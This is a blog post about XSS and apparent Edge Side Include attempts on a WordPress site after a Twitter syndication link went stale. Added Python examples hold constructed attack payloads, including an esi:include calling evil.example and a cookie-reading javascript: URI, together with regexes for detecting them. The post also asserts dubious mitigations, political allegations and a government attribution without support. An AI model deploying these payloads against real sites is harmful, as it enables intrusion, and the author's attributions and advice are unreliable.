New XSS Attack Spotted Through Twitter Syndication Connection

Late last month, almost immediately after publishing a Tweet critical of Netflix for hiring Susan Rice, just months after leaked emails implicated her in the illegal smuggling of weapons and munitions into Libya in direct violation of a United Nations embargo, I began to experience a fairly large number of attempted Cross Site Scripting (XSS) attacks through a shared/syndicated connection I had established through Twitter on one of my previous domain names.

To set up the remainder of the article: months ago, when Bankrupt Medi4 was still under the name/domain of The Daily Proletariat (https://proletariatdaily.com), I configured my WordPress site to automatically post any and all new articles directly to Twitter. This process is known as Twitter syndication and can be set up manually through the wp-admin Dashboard. Honestly, after switching Twitter handles, transferring domains and making a number of other changes to my site, I had completely forgotten about the connection until the XSS attacks began to pile up.

Using vulnerabilities in the shared connection between Twitter and WordPress, hackers were able to inject malicious JavaScript in an attempt to gain access to and/or hijack my site. Moreover, given that the domain (proletariatdaily) had long since been removed and disconnected from https://bankruptmedia.com, my current primary domain, this also means that the attackers were attempting to compromise a cached version of my website as it existed before March 2018.

How do I know this?

Cross-referencing the 404 error logs on my firewall with the timing of the attacks, on multiple occasions I noticed well over three dozen hits on the URL:

https://proletariatdaily.com/2017/09/15/emails-belonging-to-emirate-ambassador-to-the-united-states-hacked-leaked-online/

instead of

https://bankruptmedia.com/2017/09/15/emails-belonging-to-emirate-ambassador-to-the-united-states-hacked-leaked-online/

as the website/article currently exists, and has existed for months.

This means that hackers were attempting XSS attacks on the cached version of the article as it existed before I made the domain switch. For example, here is just a small sample of my firewall logs from one of the attacks, and there are over three dozen more logs just like it:

[Image: sample of firewall 404 log entries from one of the attacks]
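The cross-referencing described above (sorting 404 hits by the Host they were aimed at and checking whether the request carries an XSS- or ESI-style payload) can be automated. The following is an added example written for this page, not the author's tooling or real logs: the log lines are constructed, and the line format (client IP, Host, timestamp, request line, status) is an assumption, so the parsing regex would need adjusting for a real firewall's format.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log lines (not the author's real firewall logs).
# Assumed format: <client ip> <host> [<timestamp>] "<method> <target> <proto>" <status>
SAMPLE_LOG = """\
203.0.113.7 proletariatdaily.com [03/Apr/2018:14:02:11 +0000] "GET /2017/09/15/emails-belonging-to-emirate-ambassador-to-the-united-states-hacked-leaked-online/?s=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 404
203.0.113.7 proletariatdaily.com [03/Apr/2018:14:02:12 +0000] "GET /2017/09/15/emails-belonging-to-emirate-ambassador-to-the-united-states-hacked-leaked-online/?q=%3Cesi%3Ainclude%20src%3D%22http%3A%2F%2Fevil.example%2F%22%2F%3E HTTP/1.1" 404
198.51.100.4 bankruptmedia.com [03/Apr/2018:14:05:40 +0000] "GET /2017/09/15/emails-belonging-to-emirate-ambassador-to-the-united-states-hacked-leaked-online/ HTTP/1.1" 200
203.0.113.7 proletariatdaily.com [03/Apr/2018:14:02:13 +0000] "GET /wp-login.php?redirect_to=javascript%3Aalert(document.cookie) HTTP/1.1" 404
192.0.2.9 bankruptmedia.com [04/Apr/2018:09:11:02 +0000] "GET /feed/ HTTP/1.1" 200
"""

LINE_RX = re.compile(
    r'^(?P<ip>\S+) (?P<host>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})$'
)

# Payload signatures worth flagging in a request target. Event handlers are
# matched by an explicit list so words like "online" in a slug do not trigger.
PAYLOAD_PATTERNS = {
    "script_tag": re.compile(r"<\s*script", re.I),
    "js_uri": re.compile(r"javascript\s*:", re.I),
    "event_handler": re.compile(r"\bon(error|load|click|mouseover|focus)\s*=", re.I),
    "esi_include": re.compile(r"<\s*esi:", re.I),
}


def parse_log(text):
    """Parse every well-formed line into a dict; silently skip anything else."""
    entries = []
    for line in text.splitlines():
        m = LINE_RX.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def classify_payload(target):
    """Return the payload signatures found after decoding percent-encoding.
    Decoding twice catches the common double-encoding evasion."""
    decoded = target
    for _ in range(2):
        decoded = unquote(decoded)
    return [name for name, rx in PAYLOAD_PATTERNS.items() if rx.search(decoded)]


def flag_xss_hits(entries):
    """Attach a 'payload' list to each entry that carries one and return those."""
    flagged = []
    for e in entries:
        kinds = classify_payload(e["target"])
        if kinds:
            flagged.append({**e, "payload": kinds})
    return flagged


def summarize(text):
    """Cross-reference: which Host header did the payload-bearing hits target?
    A legacy hostname showing up here means the attacker is working from a
    stale copy of the site, exactly the pattern described in the article."""
    flagged = flag_xss_hits(parse_log(text))
    return {
        "flagged": flagged,
        "hits_by_host": Counter(e["host"] for e in flagged),
        "sources": Counter(e["ip"] for e in flagged),
    }


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    for host, n in s["hits_by_host"].items():
        print(f"{n} payload-bearing hits aimed at Host {host}")
    for e in s["flagged"]:
        print(e["ts"], e["host"], e["payload"], e["target"][:60])
```

On the constructed sample, every flagged hit targets the legacy hostname, which is the signal the article relies on: requests carrying `<script>`, `javascript:` or `<esi:` payloads aimed at a Host that no longer serves the site can only be working from a cached or otherwise stale copy of it.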

Interestingly enough?

New research published by GoSecure on April 3rd 2018, the same day as one of the attacks above, explains how hackers have begun exploiting Edge Side Include (ESI) processing in caching servers to conduct advanced XSS-style attacks on the web, exactly the type of attack I had been experiencing in late March to early April. GoSecure's article goes on to explain how:

[Image: excerpt from GoSecure's article on Edge Side Include injection]

Read GoSecure’s Full Article Here: http://gosecure.net/2018/04/03/beyond-xss-edge-side-include-injection/
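To make concrete what "exploiting caching servers" means in the ESI case, here is an added example written for this page; it is not code from GoSecure's article or from any real cache product. It simulates an edge cache that resolves `<esi:include>` tags in responses from the origin. The backend URLs, the reflected-comment page and the internal resource are all constructed, and the assumption that the surrogate only processes ESI when the origin opts in with a Surrogate-Control header follows the Edge Architecture Specification; Varnish, by contrast, is switched on per response in VCL rather than by that header.

```python
import html
import re

# Constructed stand-in for what the surrogate can fetch. The internal URL
# represents a resource reachable from the cache but not from the Internet.
BACKEND = {
    "http://internal.example/admin/secret": "ADMIN-ONLY-DATA",
    "http://cdn.example/fragments/header.html": "<header>Site header</header>",
}

ESI_INCLUDE = re.compile(r'<esi:include\s+src="([^"]+)"\s*/>')

# The tag an attacker submits as a "comment". If the origin reflects it
# unencoded and the cache processes ESI, the cache fetches the src itself.
ATTACK = '<esi:include src="http://internal.example/admin/secret"/>'


def fetch(url):
    """Simulated subrequest made by the edge (no network is used)."""
    return BACKEND.get(url, "")


def render_comment_page_vulnerable(comment):
    """Origin response that reflects user content with no output encoding.
    The header include is the site's own, legitimate ESI usage."""
    body = ('<esi:include src="http://cdn.example/fragments/header.html"/>'
            f'<p class="comment">{comment}</p>')
    return {"Surrogate-Control": 'content="ESI/1.0"'}, body


def render_comment_page_hardened(comment):
    """Same page, but user content is HTML-escaped before it is emitted, so
    no '<' from the user can form an <esi:...> tag by the time the cache
    sees the body. Output encoding is the fix; the cache cannot tell the
    site's includes from an attacker's."""
    body = ('<esi:include src="http://cdn.example/fragments/header.html"/>'
            f'<p class="comment">{html.escape(comment)}</p>')
    return {"Surrogate-Control": 'content="ESI/1.0"'}, body


def surrogate_process(headers, body, require_surrogate_control=True):
    """Simulated edge cache: resolve every <esi:include> by fetching its src.
    With require_surrogate_control=True (assumed to be how a careful
    deployment is configured) ESI is only processed when the origin opted
    in; a cache that processes ESI unconditionally behaves as if False."""
    if require_surrogate_control and "ESI/1.0" not in headers.get("Surrogate-Control", ""):
        return body
    return ESI_INCLUDE.sub(lambda m: fetch(m.group(1)), body)


def demo():
    """Return (vulnerable result, hardened result) for the same attack input."""
    vuln = surrogate_process(*render_comment_page_vulnerable(ATTACK))
    safe = surrogate_process(*render_comment_page_hardened(ATTACK))
    return vuln, safe


if __name__ == "__main__":
    vuln, safe = demo()
    print("vulnerable:", vuln)
    print("hardened:  ", safe)
```

In the vulnerable path the attacker's tag is indistinguishable from the site's own header include, so the edge fetches the internal resource and serves its contents to whoever requested the page; in the hardened path the same input survives only as `&lt;esi:include ...&gt;` text. Purging the cache, as described below, removes already-poisoned copies but does not stop the next injection; only encoding user content at the origin (and not enabling ESI for responses that do not need it) does.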

How To Mitigate The Attack In The Future?

Disconnecting the shared Twitter syndication connection through the wp-admin Dashboard is the obvious fix here, but wouldn't you know it? As soon as I purged my website's Varnish cache the attacks magically disappeared and I haven't seen a single one since. This attack also highlights exactly why everyone should disable JavaScript in whatever web browser they happen to use, especially for work. For example, the NoScript browser add-on alerted me to the XSS attack well before I audited my firewall logs. So, shout out to NoScript! 😉 Additionally, in addition to mitigating some forms of DDoS attacks, forcing all of your website's traffic through https can also help mitigate this specific type of XSS attack as well.

If you own a WordPress site like me, there are plugins specifically designed to purge the Varnish cache and/or force website traffic through https; just search for them to learn more.

Lastly, This Is An Extremely Advanced Attack

Considering that I am the first person on the internet to report this style of XSS attack, at least that I am aware of, and that the attacks only started after I criticized the former National Security Advisor for "allegedly" violating international law and contributing to the genocide of thousands of people, I have no reason to believe anything other than that this attack originated from some of the highest levels of the United States Government, but that might just be the inner 'tin foil hatter' in me talking.

Moreover, considering that the attack involved the attempted exploitation of cached versions of my website, research about which was first published by GoSecure just last week, it is only a testament to how innovative these attacks really are.



Categories: Hacking News
